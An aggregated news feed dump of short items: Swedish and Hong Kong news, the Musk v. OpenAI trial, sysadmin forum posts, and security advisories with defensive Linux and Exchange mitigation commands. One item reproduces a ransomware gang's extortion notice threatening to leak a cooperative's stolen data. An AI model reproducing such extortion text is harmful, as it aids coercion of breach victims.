For the past month, timber truck driver Emil Mäki Taavola has been driving electric. He hauls timber from the forests in Luleå to the paper mill in Karlsborg outside Kalix. "It's quiet and pleasant," he says.
Starting today, a new national regulation against invasive species is being introduced. The EU list that has applied since 2016 has lacked many species that are a problem in Sweden, something that is now set to change.
More and more young people are joining the scouts; membership has increased across the whole country. In Umeå, this is noticeable in the forests. "Scouting is life, you feel alive," says Elene Demeestere of Umeå Scoutkår.
With the right kind of play, you can build a stronger relationship with your dog in just a few minutes a day. That is the finding of a new study from Linköping University.
Sweden's firefighters are being trained for heightened preparedness. New threats mean that firefighters' skills are to be expanded, and among other things Russia's "double tap" is being looked at.
More than 300 pupils in Gårdsten are heading into the summer break in total uncertainty. But at the eleventh hour there is now news that could save the school from closure. "We have just submitted building permit documents and received a letter of intent from a private property owner," CEO Emil Mattson tells SVT.
An anonymous reader quotes a report from Reuters: A lawyer for Elon Musk hammered at the credibility of OpenAI CEO Sam Altman on Thursday, near the end of a trial over whether to hold the ChatGPT maker and its leaders responsible for allegedly transforming the nonprofit into a vehicle to enrich themselves. OpenAI's lawyers fought back, claiming the world's richest person waited too long to claim OpenAI breached its founding agreement to build safe artificial intelligence to benefit humanity, and couldn't claim he was essential to its success. "Mr. Musk may have the Midas touch in some areas, but not in AI," said William Savitt, a lawyer for OpenAI. "To succeed in AI, as it turns out, all Mr. Musk can do is come to court." The claims were made during closing arguments of a trial in the Oakland, California, federal court. [...] In his closing argument, Musk's lawyer Steven Molo told jurors that five witnesses, including Musk, former OpenAI board members and former OpenAI Chief Scientist Ilya Sutskever, testified that Altman was a liar. Molo also noted that during cross-examination on Tuesday, Altman did not say yes unequivocally when asked if he was completely trustworthy and did not mislead people in business. "Sam Altman's credibility is directly at issue in this case," Molo said. "If you don't believe him, they cannot win." Molo accused OpenAI of wrongfully trying to enrich investors and insiders at the nonprofit's expense, and failing to prioritize AI's safety. He also challenged Brockman's goals for the business, citing Brockman's statement that his own OpenAI stake was worth nearly $30 billion. "The arrogance, the lack of sensitivity, the failure to account for just common decency is really, really abhorrent." Musk also accused Microsoft, which invested $1 billion in OpenAI in 2019 and $10 billion in 2023, of aiding and abetting OpenAI's wrongful conduct. "Microsoft was aware of what OpenAI was doing every step of the way," Molo said.
Sarah Eddy, another lawyer for the OpenAI defendants, accused Musk and his legal team in her closing argument of resorting to "sound bites and irrelevant false accusations." Eddy said by 2017, everyone associated with OpenAI -- including Musk, then still on its board -- knew it needed more money to fulfill its mission than it could raise as a nonprofit. "Mr. Musk wanted to turn OpenAI into a for-profit company that he could control," she said. "But the other founders refused to turn the keys of AGI (artificial general intelligence) over to one person, let alone Elon Musk." She also said if Musk truly believed AI should serve humanity, he would not have pushed to fold OpenAI into his electric car company Tesla, or made his rival xAI a for-profit company. Musk had a three-year statute of limitations to sue, and OpenAI's lawyers said his August 2024 lawsuit came too late because he knew several years earlier about OpenAI's growth plans. Eddy expressed disbelief that Musk claimed he did not read a four-page term sheet in 2018 discussing OpenAI's plan to seek outside investments. "One of the most sophisticated businessmen in the history of the world" wouldn't have "stuck his head in the sand," Eddy said. Savitt accused Musk of having "selective amnesia." Microsoft's lawyer Russell Cohen said in his closing statement that Microsoft wasn't involved in the key events of the case, and was "a responsible partner at every step." On Monday, the nine-person jury is expected to begin deliberating. The judge and lawyers will also return to court to discuss possible remedies if Musk wins, including how OpenAI should be restructured and what damages might be awarded. If Musk loses, there will be no remedies to consider.
Recap:
OpenAI Trial Wraps Up With 'Jackass' Trophy For Challenging Musk (Day Eleven)
Sam Altman Testifies That Elon Musk Wanted Control of OpenAI (Day Ten)
Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine)
Sam Altman Had a Bad Day In Court (Day Eight)
Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven)
Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six)
OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five)
Musk Concludes Testimony At OpenAI Trial (Day Four)
Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three)
Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two)
Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One)
Read more of this story at Slashdot.
Hong Kong’s privacy watchdog has condemned the owner of an education platform for paying a ransom to hackers who stole individuals’ personal data from 9,000 institutions worldwide, arguing that the money should have been spent on strengthening cybersecurity. Privacy Commissioner for Personal Data Ada Chung Lai-ling on Friday also questioned whether the hackers had truly returned the data stolen from Canvas and urged affected users to stay alert for suspicious calls or messages claiming to be...
10 degrees and nearly clear in Alingsås during the morning. Alingsås Tidning
On Friday, Donald Trump's visit to Beijing and the talks with Xi Jinping concluded. China describes the visit as a "historic milestone". "We have solved a lot of different problems that others would not have been able to handle," says Trump, Reuters reports.
Against the backdrop of ceremonial grandeur at the Great Hall of the People on Thursday, US President Donald Trump leaned on centuries of shared history to set the stage for the future of China-US relations. In his state banquet address capping a long day of talks, tourism and toasts, Trump blended calculated callbacks with personal touches – carefully crafted to appeal to the hosts, including President Xi Jinping. He framed the relationship as “one of the most consequential” in world history,...
Turnover soars as Cathay takes off. By Jerry Norton. This article was first published on May 16, 1986. Cathay Pacific Airways had a memorable take-off in the stock market yesterday, accounting for a massive $446 million worth of turnover, more than the combined value of all other shares traded. The action in the rest of the market was strictly pedestrian, however, as the excitement over Cathay failed to spill over to other shares and the Hang Seng index dropped 27 points. In volume terms, 86.6...
New landlord wants to improve central residential area. Alingsås Tidning
Article URL: https://discuss.grapheneos.org/d/35428-recaptcha-mobile-verification-is-bringing-the-play-integrity-api-to-desktops Comments URL: https://news.ycombinator.com/item?id=48143997 Points: 57 # Comments: 30
New owners for house sold for 3,230,000 kronor in Alingsås. Alingsås Tidning
140-square-metre house sold in Alingsås; the price: 5,750,000 kronor. Alingsås Tidning
The meeting with the British monarch was Te Arikinui's first since she became Maori Queen in 2024.
As a senior policymaker ponders whether all South Koreans should enjoy an ‘AI dividend’
The reported visit to Havana came after the US renewed an offer of aid to ease the effects of its oil blockade.
Article URL: https://tmctmt.com/posts/mullvad-exit-ips-as-a-fingerprinting-vector/ Comments URL: https://news.ycombinator.com/item?id=48143880 Points: 355 # Comments: 193
A maximum-severity zero-day vulnerability in Cisco Catalyst SD-WAN Controller is being actively exploited in the wild, allowing unauthenticated remote attackers to fully bypass authentication and seize administrative control of enterprise network infrastructure. Tracked as CVE-2026-20182 with a CVSS score of 10.0, the flaw puts SD-WAN deployments across on-premises, cloud, and government environments at critical risk. […] The post Cisco Catalyst SD-WAN Controller 0-Day Actively Exploited to Gain Admin Access appeared first on Cyber Security News.
Dell confirms its SupportAssist software causes Windows BSOD crashes

Public confirmation from Dell didn't come until 12 hours after we had pushed a fix internally. It took one replaced laptop and multiple hours of after-hours troubleshooting with frustrated employees to get to the bottom of this one. Admittedly, had I looked harder at the logs, I would have seen the SupportAssist critical failure, but having been a hectic MSP week my brain processed it as SupportAssist detecting a problem prior to the crash, rather than being the cause. First ticket comes in with BSOD every 37 minutes on the dot -- chkdsk, dism, sfc, the works don't fix it, so we replace with plans to reimage later. Second ticket comes in much later in the day, "computer rebooting every 30 minutes!" "Oh no" Before I could get a chance to even check the second ticket we get a wave of employees reporting the same thing, expressing that it had been happening all day. At this point pattern recognition kicks in and I recognize there must be something pushing, like a bad Windows Update or Dell Command Driver Update. I take my time running through all of those, running Windows built-in reinstall, the works -- nothing. After the failed Windows reinstall and a beer later I go back to the error logs and start comparing devices. 0xEF_DellSupportAss_BUGCHECK_CRITICAL_PROCESS_c0000005_DellSupportAss!unknown_function That's gotta be fuckin it right? Let's just wipe Dell SupportAssist entirely and see how it goes. 38 minutes later? Computer is still online. Let's gooooo. Fuck you Dell. I haven't forgotten about your failure to fix the BIOS issues causing crashing with specific Nvidia cards on your XPS 8930, and I won't forget this. Lenovo is looking pretty juicy. submitted by /u/Zromaus
I'm looking for a good way for our helpdesk to verify a user's identity prior to completing a password reset. In my past life, we had Duo, and this was a native feature. At my current gig, we use Microsoft Authenticator. I'm trying to find a way to send push notifications via the Microsoft Authenticator app. I spent a good bit of time trying to replicate the approach shown here (https://www.cyberdrain.com/automating-with-powershell-sending-mfa-push-messages-to-users/), but it's a few years old and relies on a lot of deprecated methods. Also, it seems more geared towards MSPs with delegated tenant access, which I am not. Has anyone found a way to implement something like this lately? Or if not, does anyone have suggestions for a better way to go about the key goal of verifying end users prior to password resets? submitted by /u/cheesehead1996
Suspected drones moved over Nyland in southern Finland on Friday morning. Helsinki Airport was closed to all traffic but is running again, according to Finavia, as the rescue services have announced that the danger is now over.
Is there a way to prevent Copilot from running? submitted by /u/soldieroscar
NATO's foreign ministers gather this week in Helsingborg. It is the first ministerial meeting in Sweden since the country joined the alliance, at a time when the relationship between the US and Europe is described as unusually bad. Foreign Minister Maria Malmer Stenergard says the situation is serious and stresses that NATO must hold together. "My aim with this meeting is to contribute to cohesion and unity in the alliance," she says.
This is part of the dirtyfrag family, but is different enough to warrant its own CVE. https://www.bleepingcomputer.com/news/security/new-fragnesia-linux-flaw-lets-attackers-gain-root-privileges/ Known as Fragnesia and tracked as CVE-2026-46300, this security flaw stems from a logic bug in the Linux XFRM ESP-in-TCP subsystem that can enable unprivileged local attackers to gain root privileges by writing arbitrary bytes to the kernel page cache of read-only files. Immediate patching if you cannot update:

    rmmod esp4 esp6 rxrpc
    printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf

submitted by /u/NoDistrict1529
Following Dirty Frag, Fragnesia, and other Linux kernel vulnerabilities making themselves known in recent days, the latest now is ssh-keysign-pwn...
Japan’s ruling Liberal Democratic Party is weighing a sharp rise in defence spending as pressure from US President Donald Trump and deteriorating regional security conditions force Tokyo to reassess how much it must do to protect itself. The party is expected to debate raising outlays to as much as 5 per cent of gross domestic product, a level that would bring Japan in line with many Nato member states and mark another major shift for a country that had long kept defence spending close to 1 per...
Hong Kong is in a unique position to capitalise on yacht tourism – with over 1,000km of coastline and more than 200 islands, this natural advantage is something few international cities can match. Recent policy initiatives, ranging from new mooring developments to cross-boundary integration within the Greater Bay Area, signal the government’s clear intent to further promote the marine economy. Plans to add over 1,100 new berths and expand key sites, such as the Aberdeen typhoon shelter and the...
A 70-year-old woman has died in a fire at a Hong Kong flat, with police suspecting it was caused by a malfunctioning air-conditioner. The blaze broke out at Yu Tung Court’s Hei Tung House in Tung Chung on Friday, with police saying they received reports from several residents at around 4.42am. “A woman was certified dead at the scene and her body was found when firefighters arrived,” a police spokesman said, adding that around 300 people had to be evacuated. “Some residents said they saw black...
United Quality Cooperative provides a range of services including bulk fuel, propane, lubricants, and agricultural products. We have at our disposal internal corporate correspondence, financial documents, personal data of company employees and much more. All stolen information will be published in the public domain in a week, if the company's management does not pay.
A doctor was sentenced to 18 months’ jail on Thursday for administering a substance to a woman as part of an aesthetic treatment that killed her. The ethylenediaminetetraacetic acid (EDTA) was administered too quickly and at too high a concentration, causing 31-year-old Lau Li Ting to develop EDTA toxicity, which led to cardiac arrest and death. Dr Chan Bingyi later concealed the fact that he had administered EDTA to the victim from her family, paramedics and doctors, in what the judge said was...
Article URL: https://writing.antonleicht.me/p/cut-off Comments URL: https://news.ycombinator.com/item?id=48143284 Points: 138 # Comments: 108
Article URL: https://www.theembeddedrustacean.com/uferris Comments URL: https://news.ycombinator.com/item?id=48143256 Points: 20 # Comments: 3
China has unveiled its latest photonic quantum computer, Jiuzhang 4.0, with researchers saying it can outperform the world’s fastest classical supercomputer by a vast margin, further strengthening Beijing’s push towards quantum supremacy. The results, published on May 13 in the peer-reviewed journal Nature, mark the latest milestone in China’s rapidly advancing quantum programme led by a team of scientists at the University of Science and Technology of China headed by Chinese quantum physicist...
A young Chinese man has gone viral for making and selling fried rice wearing a suit at a night market, making 50,000 yuan (US$7,400) a month. The man, surnamed Lu, began running the stall in Yantai in eastern China’s Shandong province when he was 17 and has now become the “backbone” of his family. To look more “decent”, on a whim, he decided to don a suit one day while cooking the fried rice. Lu, now 19, often strikes stylish poses while cooking, such as slicking back his hair, winking at the...
Although the Iran conflict continues, European defence companies have fallen back sharply. But that should not be read as investors expecting a more peaceful world ahead, or as a sign that demand for weapons will fall. The falling share prices have other causes, says Robert Vicsai, a defence fund manager at SEB.
A Taiwanese student experimenting with software-defined radio technology shut down three bullet trains for nearly an hour, leading to an anti-terrorism response.
Microsoft first started opening up access to Claude Code in December, inviting thousands of its own developers to use Anthropic's AI coding tool daily. It was part of an effort to get project managers, designers, and other employees to experiment with coding for the first time, and sources tell me that Claude Code has proved […]
On Friday, the final day of his Beijing trip, US President Donald Trump met his Chinese counterpart Xi Jinping, this time over tea and a working lunch. Trump arrived in the Chinese capital on Wednesday...
After rescue services dug more victims out of the rubble in Kyiv, the death toll now stands at 24 people, following Russia's attacks on Thursday morning. During the night leading into Friday, the governor of the Zaporizhzhia province reported that explosions had again been heard in the region. The massive attacks on Ukrainian cities have gone on practically without interruption since Wednesday.
Valve's new Steam Controller, which began shipping earlier this month for $99 USD, is a great piece of hardware. This high-end gaming controller is great hardware-wise, but what some may not enjoy about it currently is the tight integration with the Steam controller and no native OS drivers currently for use outside of Steam. As a big win today, the widely-used SDL3 gaming software/hardware abstraction library has added support for the new Steam Controller that works outside the confines of Steam...
Latvia's Ministry of Defence says the country's airspace may have been violated during the night leading into Friday.
Hey all, I hope this isn't against sub rules. I'm looking for a reasonably priced Ticketing solution that doesn't need to be locally hosted. This is for a small 3-person IT Support team that services ~150-200 end-users at multiple locations. My criteria is customizable status selections for each ticket (Not Started, Awaiting Hardware, Awaiting Network Team, etc) that can be adjusted on our own portal, but also has a customer-facing option to view the date/time/status of their ticket without having to reach out directly to our team. Does anyone have any recommendations or suggestions of online solutions to look into? Ideally the IT team portal could support multiple accounts/logins for ticket management, but this would not be a deal breaker. Thanks in advance. submitted by /u/Apocoflips
The Greater Manchester mayor faces a messy and bitter by-election battle with Reform UK.
As many of the world's best struggle at the US PGA Championship, Scottie Scheffler - the world's very best - is among a select few to get change out of Aronimink.
The Russkaya Obshina group stages raids to look for activities contravening "traditional Russian values".
Canada’s proposed free-trade agreement with Asean could help the region expand sectors ranging from mining to manufacturing while advancing Ottawa’s push to reduce its dependence on the US, according to analysts, as both sides seek to accelerate economic diversification. Canadian International Trade Minister Maninder Sidhu confirmed to Bloomberg on Tuesday, during a visit to Manila, that Canada was keen to conclude separate pacts with the Association of Southeast Asian Nations and the...
"It could go well or completely wrong, I'm just here for the ride," says song contest hopeful Sam Battle.
Trafikverket's warning: animals on the road on the E20 (Alingsås Tidning)
Article URL: https://github.com/rust-lang/rust-forge/pull/1040 Comments URL: https://news.ycombinator.com/item?id=48142650 Points: 77 # Comments: 36
Leicester Comedy Festival says it is committed to paying comedians but waiting on money themselves.
The monarchy’s finances have long been protected by tradition. Now experts say the public are demanding more transparency
Here's a look at the tech powering the first big IPO of 2026
Eben Upton warns against claims that Artificial Intelligence will destroy vast numbers of computing roles over the coming years.
Long lines stretching across several blocks have formed in Hong Kong as shoppers turned up days ahead of the launch of the “Royal Pop” pocket watches – a collaboration between luxury watchmaker Audemars Piguet and Swatch. A South China Morning Post reporter observed about 50 people queuing in Causeway Bay on Thursday evening, a few metres from the Swatch store on Kai Chiu Road. “If you don’t try, you don’t win,” said one hopeful, who only gave his name as Jackson. “How many opportunities do you...
The UK's Competition and Markets Authority is opening a formal investigation into whether Microsoft's bundling of Windows, Office, Teams, Copilot, and related products harms competition. Engadget reports: "Our aim is to understand how these markets are developing, Microsoft's position within them and to consider what, if any, targeted action may be needed to ensure UK organizations can benefit from choice, innovation and competitive prices," CMA Chief Executive Sarah Cardell said in a statement published by Reuters. She also stressed the importance of the investigation by noting that hundreds of thousands of UK residents use business software and Microsoft products. The organization will take a look into the company's cloud licensing practices. The CMA has stated that the inquiry will conclude by February. At that point, Microsoft could get slapped with a strategic market label. Microsoft says it's "committed to working quickly and constructively with the CMA to facilitate its review of the business software market." A strategic market designation doesn't automatically assume wrongdoing, but will give the CMA more leeway when conducting further interventions.
Delta Goodrem is now a favourite to win Eurovision, following a spectacular semi-final performance.
The United States cast Israel-Lebanon talks held in Washington on Thursday as “productive and positive” and a State Department official said more discussions aimed at ending their conflict will continue on Friday. A senior Lebanese official said earlier that Lebanon will demand that US ally Israel cease fire in the face-to-face talks, as Israel and Iran-backed Hezbollah continued to trade blows despite a US-backed truce declared last month. An Israeli government spokesperson said the talks were...
The TeamPCP hacker group is threatening to leak source code from the Mistral AI project unless a buyer is found for the data. [...]
Here's what the biggest tech court case of the year is all about.
Honda revealed prototypes of two new hybrid models, an Accord sedan and the Acura RDX SUV, during its annual business briefing this week, built on a platform that it says will begin launching next year. The RDX was announced earlier this year as Honda's first SUV to feature the next-gen version of its two-motor hybrid […]
Abortion pills are the most common method of terminating pregnancies in the US.
Dynamic EPP is one of the new AMD P-State features in Linux 7.1, but, unfortunately is causing some fallout in early usage of this power-savings related functionality...
https://shkspr.mobi/blog/2026/05/uk-government-kicks-out-pal... Comments URL: https://news.ycombinator.com/item?id=48142251 Points: 147 # Comments: 44
Other than Instructure execs - maybe?
We use Intune for our MDM. Was curious to know how y’all configure your configuration profiles for Windows devices. I guess my main dilemma is that an individual on our security team is pushing us to lump ALL settings of the same policy type into one profile. (i.e., all settings catalog settings in one profile, all administrative templates in one profile). As a way to lessen the amount of profiles that we have. E.g., all Edge settings, M365 app settings, Chrome settings into one profile. Is this frowned upon? I guess I would create+name them by their purpose/function. This seems like what a lot of orgs do, based on initial research. submitted by /u/Axelpeach
Article URL: https://news.vt.edu/articles/2026/05/drought-united-states-la-nina-expert.html Comments URL: https://news.ycombinator.com/item?id=48142193 Points: 188 # Comments: 73
Article URL: https://www.theregister.com/ai-ml/2026/05/14/ontario-auditors-find-doctors-ai-note-takers-routinely-blow-basic-facts/5240771 Comments URL: https://news.ycombinator.com/item?id=48142188 Points: 224 # Comments: 104
Today was closing arguments in the Musk v. Altman trial, and I almost feel bad writing about the unbelievable demolition derby I just witnessed. Steven Molo, Musk's lawyer, stumbled over his words. He at one point called Greg Brockman - a co-defendant - Greg Altman. He erroneously claimed that Musk wasn't asking for money and […]
Article URL: https://antirez.com/news/165 Comments URL: https://news.ycombinator.com/item?id=48142108 Points: 292 # Comments: 107
Three clear points for Södra Härene against Östadkulle (Alingsås Tidning)
US President Donald Trump’s landmark visit to China comes as the US-Iran war disrupts global energy supplies, fuels economic uncertainty and adds fresh strain to Washington-Beijing ties. In the latest instalment of a series examining how rivalry, interdependence and geopolitical crises are reshaping the relationship between the two powers, we explore the intensifying US-China legal arms race. For years, global businesses have been struggling to navigate rising trade tensions between the United...
The head of the CIA visited Cuba on Thursday, an extraordinary step-up in contact between Washington and Havana as the communist-run island reels from US pressure, declaring that it was out of oil. John Ratcliffe’s trip appeared to be only the second visit by a CIA director to Cuba since former leader Fidel Castro’s 1959 revolution. Ratcliffe met with Raul Guillermo Rodriguez Castro, grandson of former president Raul Castro, Interior Minister Lazaro Alvarez Casas and the head of Cuban...
AT&T, Verizon, and T-Mobile have agreed in principle to form a joint venture (JV) aimed at reducing U.S. mobile dead zones through satellite connectivity, especially in rural areas and during emergencies when ground networks fail. Here are three of the customer benefits listed by the JV (as highlighted by Droid Life): Fewer coverage gaps: Will nearly eliminate dead zones in the U.S. currently without mobile service, reaching previously unserved areas. Reliable connectivity in emergencies: Redundant connectivity will become available when existing ground-based networks are unavailable due to extreme natural disasters or other unusual disruptions. Improved network performance: Will give customers more consistent performance and simpler access to satellite services across providers. This will speed up feature updates and improve connectivity for everyone, everywhere. "It will still take time for these improvements to be available to customers, but this all seems like a positive step," writes Droid Life's Tim Wrobel.
The Green Party leader previously told Hackney mayoral candidate Zoë Garbett "you have my vote".
On May 14, 2026, Microsoft disclosed CVE-2026-42897, a reported vulnerability affecting Exchange Outlook Web Access (OWA). An attacker could exploit this issue by sending a specially crafted email to a user. If the user opens the email in Outlook Web Access and certain interaction conditions are met, arbitrary JavaScript can be executed in the browser context.

The following on-premises Exchange Server versions are impacted:
- Exchange Server 2016 (any update level)
- Exchange Server 2019 (any update level)
- Exchange Server Subscription Edition (SE) (any update level)
Exchange Online is not impacted by this vulnerability.

Mitigations

Option 1 (recommended): Exchange Emergency Mitigation (EM) Service
For customers who have the Exchange EM Service enabled, Microsoft released the automatic mitigation for Exchange Server 2016, 2019 and SE. The mitigation is already published and is enabled automatically. As a reminder, EM Service was released in September 2021 and is enabled by default. More information on this service can be found in Exchange Emergency Mitigation Service (Exchange EM Service) | Microsoft Learn.
Customers with EM Service enabled can verify that their servers have applied the mitigation for CVE-2026-42897 (the ID of the mitigation is M2.1.x) by doing the following:
- Follow the steps outlined in the documentation: Viewing Applied Mitigations.
- To quickly check the status of EM Service and applied mitigations in your organization, you can run the Exchange Health Checker script: https://aka.ms/ExchangeHealthChecker. The HTML report will include a section on EEMS check results.
Using EM Service is the best way for your organization to mitigate this vulnerability right away. If you have EM Service currently disabled, we recommend you enable it right away. Please note that EM Service will not be able to check for new mitigations if your server is running an Exchange Server version older than March 2023 as per this article. To check the exact version of Exchange currently in use, utilize Option 1 or Option 2 mentioned on this page: Exchange Server build numbers and release dates | Microsoft Learn.

Option 2: Scripted application of mitigation
For customers who are unable to use the EM Service (for example, disconnected or air-gapped environments), we are providing the following process to enable this mitigation:
- Download the latest version of the Exchange on-premises Mitigation Tool (EOMT) from: https://aka.ms/UnifiedEOMT
- Apply the mitigation on a per-server basis or on all servers at once by running the script via an elevated Exchange Management Shell (EMS):
  Single server:
    .\EOMT.ps1 -CVE "CVE-2026-42897"
  All servers:
    Get-ExchangeServer | Where-Object { $_.ServerRole -ne "Edge" } | .\EOMT.ps1 -CVE "CVE-2026-42897"

Known issues when mitigation is applied
We are aware of the following known issues once the CVE-2026-42897 mitigation is applied (using either option above):
- OWA Print Calendar functionality might not work. As a workaround, copy the data or screenshot the calendar you want to print, or use the Outlook Desktop client.
- Inline images might not display correctly in the recipient's OWA reading pane. As a workaround, send images as email attachments or use the Outlook Desktop client.
- OWA light (OWA URL ending in /?layout=light) does not work properly. Please note that this feature was deprecated several years ago and is not intended for regular production use.
- We are aware of the mitigation showing "Mitigation invalid for this exchange version." in mitigation details. This issue is cosmetic and the mitigation DOES apply successfully if the status is shown as "Applied". We are investigating how to address this.

Addressing the vulnerability permanently
Microsoft is working on and will release and announce a security update for impacted versions of Exchange Server in the future. The update will be released for Exchange SE RTM, Exchange 2016 CU23, Exchange Server 2019 CU14 and CU15 (if you are running older CU versions, please update now). Please note that the Exchange SE update will be released as a publicly available security update. Exchange 2016 and 2019 updates will be released only to customers who are enrolled in the Period 2 Exchange Server ESU program as per Announcing Period 2 Exchange 2016/2019 Extended Security Update (ESU) program. Period 1 only ESU customers will not receive this update as that ESU program ended in April 2026.

Updates to this blog post:
- 5/14/2026: Added a known issue with OWA Light.
- 5/14/2026: Added the mitigation ID (M2.1.x)
- 5/14/2026: Added a known issue with mitigation details displaying incorrect Description.

The Exchange Server Team
Article URL: https://www.openvehicles.com/home Comments URL: https://news.ycombinator.com/item?id=48141732 Points: 75 # Comments: 11
The most graphically-impressive first-person shooter made for the Nintendo Switch is $20 off at Best Buy. Right now, you can buy the physical version of Metroid Prime 4: Beyond for $39.99 ($20 off). The game looks surprisingly good on the 2017 hardware, but runs way better on the Switch 2 with the additional $10 upgrade […]
Yesterday, in Musk v. Altman, before the jurors came in, Sam Altman's team passed up what looked - from a distance - like a little league trophy. It was not. Yvonne Gonzalez Rogers had the lawyers read the inscription aloud for the press: "Never stop being a jackass." It's a commemoration OpenAI employees bought for […]
Study suggests "the bias is real but socially constructed, rather than grounded in how women actually sound."
More than 50 employees have reportedly left Elon Musk’s newly merged SpaceXAI since February, raising questions about burnout, leadership changes, talent poaching, and whether liquidity events weakened retention incentives.
In recent years, the Brics grouping has attracted attention as it adds members and positions itself as the voice of the Global South. At a Brics forum held in Beijing last month, officials discussed expanding trade within the grouping. Such initiatives reflect both an impulse to reduce exposure to external shocks linked to the US dollar and a long-term ambition to reshape global finance. These gatherings are as much about signalling intent as delivering substance. Brics wants to be seen as a...
Meta is rolling out new features to its Meta Ray-Ban Display smart glasses, including bringing the ability to write messages just with hand gestures to all users. You'll be able to use the feature in WhatsApp, Messenger, Instagram and with "native Android and iOS messaging," Meta says. The feature, which relies on the Meta Ray-Ban […]
Just started at a small company and got access to our production server for the first time. Ran uptime and got back: up 659 days, 2:02 Is that...normal? Also noticed there's an apt-get update process that's been running since January. Not sure if that's related. What's the standard reboot cadence for prod: every 6 months? Once a year? Thanks! submitted by /u/Mediocre-Cobbler5016
Hackers are leveraging a critical authentication bypass vulnerability in the WordPress plugin Burst Statistics to obtain admin-level access to websites. [...]
Article URL: https://github.com/anthropics/claude-for-legal Comments URL: https://news.ycombinator.com/item?id=48141234 Points: 86 # Comments: 78
One little mystery—solved.
Article URL: https://www.ycombinator.com/companies/infracost/jobs/NzwUQ7c-senior-developer-advocate Comments URL: https://news.ycombinator.com/item?id=48141191 Points: 0 # Comments: 0
Hours after a smaller Xbox Cloud Gaming controller appeared online, Brazil's Anatel regulator has also accidentally published images of what appears to be Microsoft's upcoming Xbox Elite 3 controller. Tecnoblog has posted images that show the successor to the Elite 2 controller, with an interchangeable D-Pad, paddles, and two new mysterious buttons. The Elite 3 […]
A growing number of writers are leaving Substack for alternatives most people haven't heard of like Ghost, Beehiiv, Patreon, and Passport. The reason, writes The Verge's Emma Roth, is the "platform's increased focus on social features as well as a pricing model that puts a chokehold on their business." From the report: Sean Highkin, the creator of the NBA-focused publication The Rose Garden Report, tells The Verge that he makes "significantly more money" after switching from Substack to Ghost last April. "When I first joined up, [Substack] gave me a big push and featured me and funneled a lot of traffic to me, which led to a good amount of growth," Highkin says. "But once I wasn't one of the 'new recruited talent' they could tout, they stopped featuring me and I saw my growth stagnate." Highkin now pays $2,052 per year using Ghost and an add-on called Outpost, compared to $4,968 per year on Substack. The Rose Garden Report's subscriber base has grown 22 percent since the end of 2024, Highkin says. [...] Substack launched in 2017 as a platform that allows writers to create their own newsletters and manage paying subscribers. Unlike some of its biggest rivals, Substack takes a 10 percent cut of total subscription revenue. That tax may not seem substantial at first, but it quickly adds up as creators gain subscribers and begin charging more for their subscriptions. A calculator on Substack's own website estimates that for a newsletter charging $10 per month with 400 subscribers, the total monthly cost -- including the platform's 10 percent cut and credit card processing fees -- would add up to $636. That cost jumps to $15,900 per month with 10,000 subscribers and skyrockets to $79,500 per month for 50,000 members -- nearly $1 million per year. Many Substack rivals charge a flat monthly fee, rather than a commission. 
Ghost, an open-source platform for blogs and newsletters, starts at $15 per month with 1,000 members for website creation, email newsletter capabilities, and a custom domain. Beehiiv, a creator platform with tools for launching a newsletter, website, and podcast, is free for up to 2,500 subscribers with limited access to certain features, like a built-in ad network, while its other plans vary in price based on subscriber count. A person with 10,000 subscribers, for example, will pay $96 per month for Beehiiv's "Scale" plan. There's also Kit, a newsletter platform that offers a tiered pricing model similar to Beehiiv, costing $116 per month with 10,000 subscribers on its "Creator" plan. It's not just the 10% fee critics are complaining about; they also argue the platform offers limited customization and third-party integrations compared to some of the mentioned alternatives, heavily promotes its own branding and social features, and makes creators more dependent on its ecosystem. Beehiiv founder Tyler Denk argues that creators should be able to build their own brands without the platform taking center stage: "We don't want to take credit for the work of our content creators." While writers can export subscribers, content, and some payment relationships, they cannot take Substack "followers" or Apple-managed iOS billing data with them.
The update gives users enhanced flexibility over how they can manage their workflows.
The acquisition looks to boost visibility into third-party ecosystems, which are becoming a bigger concern as vectors for supply chain attacks.
Tens of thousands of Israeli celebrants have marched through the area captured by Israel in the 1967 Arab-Israeli war.
60% of evaluated AI Scribe systems mixed up prescribed drugs in patient notes, auditors say
Brazil’s government expressed concern over China’s renewal of US beef import licences, warning the move could reshape competition in the country’s largest meat export market. A senior Brazilian government official told the South China Morning Post that the renewal brought “anxiety” to the sector and could affect domestic cattle prices. China is Brazil’s largest beef market, and the quota system already reduces the country’s competitiveness, the official said. The comments came after Bloomberg...
Hardware company Atech raised $800,000 in pre-seed funding, including from a16z’s scout fund, Sequoia Scout Fund, and Nordic Makers.
Article URL: https://www.synacktiv.com/en/publications/exploiting-the-tesla-wall-connector-from-its-charge-port-connector-part-2-bypassing Comments URL: https://news.ycombinator.com/item?id=48140953 Points: 94 # Comments: 40
Political turmoil continued in Westminster on Thursday after Health Secretary Wes Streeting resigned from Starmer's government saying he had "lost confidence" in his leadership.
A US government aircraft has been seen leaving Cuba's capital Havana, just days after Donald Trump said that the US and Cuba "will talk" with each other. Reuters reports.
Article URL: https://twitter.com/tdietterich/status/2055000956144935055 Comments URL: https://news.ycombinator.com/item?id=48140922 Points: 483 # Comments: 150
In January, Colorado lawmakers introduced a proposal to make operating systems collect users' ages and pass them to app developers. The bill, SB26-051, had clearly been designed for commercial platforms like iOS and Android - one of numerous plans to age-gate the internet through users' devices. It was intended to provide information that would let […]
This is the second time this year a threat actor has leveraged a CVSS 10.0 vulnerability in Cisco's network control system.
Benchmark almost never backs hardware startups. So Eric Vishria dragged his feet 10 years ago before agreeing to hear Cerebras' pitch.
Houston Eye Associates is a team of board-certified ophthalmologists and board-licensed optometrists with advanced fellowship and specialty training in the fields of ophthalmology and optometry. With 20 locations across Greater Houston, there is a location near you.
The prime minister is fighting to stay on in No 10 as heavy election losses trigger a Labour revolt.
A moped had been used in the deadly stray-bullet shooting of a 7-month-old in Brooklyn last month, officials said.
